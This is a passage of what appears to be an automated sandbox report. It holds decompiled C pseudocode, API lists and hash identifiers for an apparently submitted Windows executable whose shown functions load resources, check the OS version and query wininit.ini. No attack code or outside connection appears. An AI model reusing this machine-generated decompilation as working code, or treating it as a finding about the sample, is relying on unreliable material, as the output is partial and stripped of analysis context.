                                                                                                                                                                                                                                      						 *0x409124 = 0x800704c7;
                                                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					E00404495(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					LocalFree( *0x408d4c);
                                                                                                                                                                                                                                      					 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				E00404495(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      				 *0x409124 = E00406233();
                                                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                      0x00403a32
                                                                                                                                                                                                                                      0x00403a43
                                                                                                                                                                                                                                      0x00403a49
                                                                                                                                                                                                                                      0x00403a4f
                                                                                                                                                                                                                                      0x00403a56
                                                                                                                                                                                                                                      0x00403a7d
                                                                                                                                                                                                                                      0x00403a86
                                                                                                                                                                                                                                      0x00403ac4
                                                                                                                                                                                                                                      0x00403aff
                                                                                                                                                                                                                                      0x00403b05
                                                                                                                                                                                                                                      0x00403b07
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403b0d
                                                                                                                                                                                                                                      0x00403ad3
                                                                                                                                                                                                                                      0x00403ae0
                                                                                                                                                                                                                                      0x00403ae8
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403aea
                                                                                                                                                                                                                                      0x00403a73
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403a73
                                                                                                                                                                                                                                      0x00403a94
                                                                                                                                                                                                                                      0x00403a9f
                                                                                                                                                                                                                                      0x00403aa5
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00403aa5
                                                                                                                                                                                                                                      0x00403a64
                                                                                                                                                                                                                                      0x00403a6e
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040467A
                                                                                                                                                                                                                                        • Part of subcall function 00404669: SizeofResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00404683
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 0040469D
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LoadResource.KERNEL32(00000000,00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A6
                                                                                                                                                                                                                                        • Part of subcall function 00404669: LockResource.KERNEL32(00000000,?,00402D11,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046AD
                                                                                                                                                                                                                                        • Part of subcall function 00404669: memcpy_s.MSVCRT ref: 004046BF
                                                                                                                                                                                                                                        • Part of subcall function 00404669: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046C9
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F57,?,00000002,00000000), ref: 00403A49
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00403A9F
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                        • Part of subcall function 00406233: GetLastError.KERNEL32(00405B72), ref: 00406233
                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00403ABC
                                                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 00403AFF
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 004064D6
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: LoadResource.KERNEL32(00400000,00000000,?,?,00402EDF,00000000,00401A00,00000547,0000083E,?,?,?,?,?,?,?), ref: 004064E4
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,00401A00,00000000), ref: 00406503
                                                                                                                                                                                                                                        • Part of subcall function 004064C3: FreeResource.KERNEL32(00000000,?,?,00402EDF,00000000,00401A00,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 0040650C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,004030F0,00000000,00000000), ref: 00403AE0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                      • Opcode ID: 4710c0716a938eb4b8055a37b7928624ddec3605709afe63a17b5a199dbee48f
                                                                                                                                                                                                                                      • Instruction ID: 8d534552f46a231fbcb10b0d6e382f5bc2242e7ed666b99e4ce5f1754f14298d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4710c0716a938eb4b8055a37b7928624ddec3605709afe63a17b5a199dbee48f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E411DF70301201ABD720AF72AE09F1739BDDFD5701710413FB642FA2E2DABD88109A2C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                      			E004024E5(void* __ebx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                                                      				_t7 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                      					E00406534( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                      0x004024e5
                                                                                                                                                                                                                                      0x004024f0
                                                                                                                                                                                                                                      0x004024f7
                                                                                                                                                                                                                                      0x004024fc
                                                                                                                                                                                                                                      0x00402509
                                                                                                                                                                                                                                      0x00402513
                                                                                                                                                                                                                                      0x00402522
                                                                                                                                                                                                                                      0x00402531
                                                                                                                                                                                                                                      0x00402546
                                                                                                                                                                                                                                      0x0040254b
                                                                                                                                                                                                                                      0x00402558
                                                                                                                                                                                                                                      0x0040255a
                                                                                                                                                                                                                                      0x0040255a
                                                                                                                                                                                                                                      0x0040254b
                                                                                                                                                                                                                                      0x0040256f

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 0040250B
                                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00402531
                                                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 00402540
                                                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00402551
                                                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 0040255A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                      • Opcode ID: a48d78d9d8fdc6decbff2b5199d3f0304b7df88f0e226ecfbd0056488425dfb7
                                                                                                                                                                                                                                      • Instruction ID: 3023a2eded0cb7e336d0df2e151ca7cdef788bd49b59ba390762ac927a9a89a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a48d78d9d8fdc6decbff2b5199d3f0304b7df88f0e226ecfbd0056488425dfb7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9019E316002286BD7209F759E0CEDBBAACEB85750F010179FA45F31D0DA789A458AAD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                                                      			E004036DC(CHAR* __ecx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t72 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                                                      						 *0x408184 = 1;
                                                                                                                                                                                                                                      						 *0x408180 = 1;
                                                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                                                      						 *0x409a40 = _t119;
                                                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                                                      						__eflags =  *0x408a34 - _t138; // 0x0
                                                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                      							_v436 = E00402A82(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                      							_t91 = E00402A82(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      											__eflags =  *0x408a38 & 0x00000001;
                                                                                                                                                                                                                                      											if(( *0x408a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                                                      												_push("OxZQ");
                                                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                                                      												_t94 = E004067CB(_t115);
                                                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "OxZQ", 0x00180030 | _t115);
                                                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												_t98 = E00406777(_t124, _t124);
                                                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                                                      									_t104 = E004028E3(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                                                      						 *0x409a40 = _t119;
                                                                                                                                                                                                                                      						 *0x408184 = 1;
                                                                                                                                                                                                                                      						 *0x408180 = 1;
                                                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                                                      						 *0x409a40 = 1;
                                                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                                                      							 *0x408184 = _t135;
                                                                                                                                                                                                                                      							 *0x408180 = _t135;
                                                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                                                      					E00404495(0, _t138);
                                                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                                                      					return E00406C80(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}





































                                                                                                                                                                                                                                      0x004036e7
                                                                                                                                                                                                                                      0x004036ee
                                                                                                                                                                                                                                      0x004036fa
                                                                                                                                                                                                                                      0x00403704
                                                                                                                                                                                                                                      0x00403706
                                                                                                                                                                                                                                      0x00403709
                                                                                                                                                                                                                                      0x0040370f
                                                                                                                                                                                                                                      0x00403719
                                                                                                                                                                                                                                      0x0040372b
                                                                                                                                                                                                                                      0x00403733
                                                                                                                                                                                                                                      0x00403734
                                                                                                                                                                                                                                      0x00403734
                                                                                                                                                                                                                                      0x00403737
                                                                                                                                                                                                                                      0x00403799
                                                                                                                                                                                                                                      0x0040379b
                                                                                                                                                                                                                                      0x0040379c
                                                                                                                                                                                                                                      0x004037a1
                                                                                                                                                                                                                                      0x004037a6
                                                                                                                                                                                                                                      0x004037a6
                                                                                                                                                                                                                                      0x004037ad
                                                                                                                                                                                                                                      0x004037ad
                                                                                                                                                                                                                                      0x004037b3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004037b9
                                                                                                                                                                                                                                      0x004037bb
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004037c3
                                                                                                                                                                                                                                      0x004037c9
                                                                                                                                                                                                                                      0x004037d6
                                                                                                                                                                                                                                      0x004037d8
                                                                                                                                                                                                                                      0x004037d8
                                                                                                                                                                                                                                      0x004037d8
                                                                                                                                                                                                                                      0x004037de
                                                                                                                                                                                                                                      0x004037e4
                                                                                                                                                                                                                                      0x004037f3
                                                                                                                                                                                                                                      0x00403805
                                                                                                                                                                                                                                      0x00403819
                                                                                                                                                                                                                                      0x0040381e
                                                                                                                                                                                                                                      0x00403824
                                                                                                                                                                                                                                      0x00403829
                                                                                                                                                                                                                                      0x0040382b
                                                                                                                                                                                                                                      0x004038d9
                                                                                                                                                                                                                                      0x004038d9
                                                                                                                                                                                                                                      0x004038e0
                                                                                                                                                                                                                                      0x004038fa
                                                                                                                                                                                                                                      0x004038ff
                                                                                                                                                                                                                                      0x004038ff
                                                                                                                                                                                                                                      0x00403901
                                                                                                                                                                                                                                      0x0040393b
                                                                                                                                                                                                                                      0x0040393b
                                                                                                                                                                                                                                      0x0040393d
                                                                                                                                                                                                                                      0x00403897
                                                                                                                                                                                                                                      0x00403897
                                                                                                                                                                                                                                      0x0040389e
                                                                                                                                                                                                                                      0x004038a0
                                                                                                                                                                                                                                      0x004038a7
                                                                                                                                                                                                                                      0x004038a9
                                                                                                                                                                                                                                      0x004038af
                                                                                                                                                                                                                                      0x00403963
